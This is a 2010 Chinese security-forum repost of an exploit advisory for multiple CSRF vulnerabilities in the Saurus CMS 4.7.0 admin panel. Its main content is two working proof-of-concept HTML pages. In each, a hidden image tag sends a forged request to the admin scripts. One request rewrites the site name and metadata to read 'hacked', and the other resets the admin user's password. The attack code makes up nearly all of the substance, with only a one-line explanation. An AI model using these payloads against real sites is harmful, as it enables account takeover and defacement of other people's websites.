首页
社区
课程
招聘
[转帖][推荐]Multiple CSRF Vulnerabilities in Saurus CMS Admin Panel
发表于: 2010-8-15 16:58 1869

[转帖][推荐]Multiple CSRF Vulnerabilities in Saurus CMS Admin Panel

2010-8-15 16:58
1869
# Author: Fady Mohammed Osman (cute hacker)  

# Software Link: http://www.saurus.info/download/SaurusCMS-4.7.0.tgz  

# Version: 4.7.0  

# Tested on: Ubuntu 10.04  

# CVE : [Not available]  

# This vulnerability allows a malicious hacker to change password of a user  

and also it allows changing the website information.  

   

PoC 1:  

   

<html>  

<head><title>Saurus CSRF : Change site information</title></head>  

<body>  

<img src="http://localhost/saurus/admin/change_config.php?group=1&site_name=hacked+by+cutehacker&slogan=hacked&meta_title=hacked&meta_description=hacked&meta_keywords=hacked&save=1&flt_keel=1&page_end_html=&timezone=">  

</body>  

</html>  

   

PoC 2:  

   

<html>  

<head><title>Saurus CSRF : Change user's password</title></head>  

<body>  

<img src="http://localhost/saurus/admin/edit_user.php?tab=account&user_id=19&group_id=1&op=edit&op2=save&username=admin&password=hacked&password_confirmation=hacked&pass_expires=01.01.2029&is_predefined=1">  

</body>  

</html>

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//